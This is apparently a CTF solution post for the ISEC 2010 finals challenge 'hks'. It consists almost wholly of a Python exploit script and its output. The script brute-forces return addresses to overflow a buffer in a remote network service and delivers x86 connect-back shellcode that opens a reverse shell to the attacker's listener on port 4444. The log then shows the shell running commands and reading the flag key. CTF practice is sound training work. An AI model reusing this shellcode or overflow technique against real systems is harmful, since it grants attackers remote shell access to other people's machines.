ISEC 2010 본선 CTF - hks

exploit.py

#!/usr/bin/python from socket import * import time def pack(data):  res = ""  for i in range(0,4):   res = res + chr(data % 0x100)   data = data / 0x100  return res HOST = "192.168.123.129" PORT = 1127 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \ "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8" + \ "\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" + \ "\x50\x54\x53\x50\xb0\x3b\xcd\x80" for ret in range(0xbfbfeb64 , 0xbfbfe000 , -20):  ret = pack(ret)  payload = "ls"  payload += "\x90"*26  payload += ret  payload += "\x04\x00"  payload += "\x90"*150  payload += SHELLCODE  payload += "\x90"*5  s = socket(AF_INET , SOCK_STREAM)  s.connect((HOST , PORT))  s.recv(1024)  s.send(payload)  s.recv(1024)  time.sleep(0.2)  s.close()

[pwn3r@localhost hks]$ ./exploit.py & nc -lv 4444 [1] 14024 Connection from 192.168.123.129 port 4444 [tcp/krb524] accepted id uid=1009(hks) gid=1009(hks) groups=1009(hks) ls -l total 1220 -rwxr-xr-x  1 hks   hks  595672 Sep 14 23:46 hksd -rw-r--r--  1 hks  hks      33 Sep 14 23:46 key cat key 2kscwfu0kqsgbdl1m7l56b01ghpmwzho